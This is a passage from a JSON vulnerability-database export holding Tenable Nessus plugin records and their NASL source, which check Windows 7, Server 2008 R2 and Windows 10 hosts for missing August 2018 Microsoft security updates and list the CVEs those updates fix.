(CVE-2018-8344)", "edition": 35, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343899: Windows 7 and Windows Server 2008 R2 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8342", "CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8397", "CVE-2018-8316", "CVE-2018-8396", "CVE-2018-8373", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-3665", "CVE-2018-8346", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS18_AUG_4343900.NASL", "href": "https://www.tenable.com/plugins/nessus/111689", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111689);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/12/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-3665\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8342\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8346\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8360\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8385\",\n \"CVE-2018-8389\",\n \"CVE-2018-8394\",\n \"CVE-2018-8396\",\n \"CVE-2018-8397\",\n \"CVE-2018-8398\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\"\n );\n script_bugtraq_id(\n 104975,\n 104978,\n 104982,\n 104983,\n 104984,\n 104986,\n 104987,\n 104992,\n 104994,\n 104995,\n 104999,\n 105001,\n 105002,\n 105027,\n 105028,\n 105030\n );\n script_xref(name:\"MSKB\", value:\"4343899\");\n script_xref(name:\"MSKB\", value:\"4343900\");\n script_xref(name:\"MSFT\", value:\"MS18-4343899\");\n script_xref(name:\"MSFT\", value:\"MS18-4343900\");\n\n script_name(english:\"KB4343899: Windows 7 and Windows Server 2008 R2 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343899\nor cumulative update 4343900. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8342, CVE-2018-8343)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8396, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345,\n CVE-2018-8346)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8397)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. 
In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\");\n # https://support.microsoft.com/en-us/help/4343899/windows-7-update-kb4343899\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3a469b20\");\n # https://support.microsoft.com/en-us/help/4343900/windows-7-update-kb4343900\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7990c33\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4343899 or Cumulative Update KB4343900\nas well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8346\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n 
script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343899', '4343900');\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343899, 4343900])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:51", "description": "The remote Windows host is missing security update 
4343892.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8401, CVE-2018-8405,\n CVE-2018-8406)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. 
For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)", "edition": 29, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343892: Windows 10 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2018-08-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_AUG_4343892.NASL", "href": "https://www.tenable.com/plugins/nessus/111686", 
"sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111686);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-0952\",\n \"CVE-2018-8200\",\n \"CVE-2018-8204\",\n \"CVE-2018-8266\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8357\",\n \"CVE-2018-8360\",\n \"CVE-2018-8370\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8381\",\n \"CVE-2018-8385\",\n \"CVE-2018-8389\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8401\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\",\n \"CVE-2018-8405\",\n \"CVE-2018-8406\"\n );\n script_bugtraq_id(\n 104977,\n 104978,\n 104980,\n 104982,\n 104983,\n 104984,\n 104986,\n 104987,\n 104992,\n 104995,\n 104999,\n 105001,\n 105006,\n 105007,\n 105008,\n 105011,\n 105012,\n 105027,\n 105030,\n 105048\n );\n script_xref(name:\"MSKB\", value:\"4343892\");\n script_xref(name:\"MSFT\", value:\"MS18-4343892\");\n\n script_name(english:\"KB4343892: Windows 10 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343892.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n 
that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. 
An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. 
(CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8401, CVE-2018-8405,\n CVE-2018-8406)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. 
(CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. 
(CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\");\n # https://support.microsoft.com/en-us/help/4343892/windows-10-update-kb4343892\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e04d903e\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4343892 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n 
For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. 
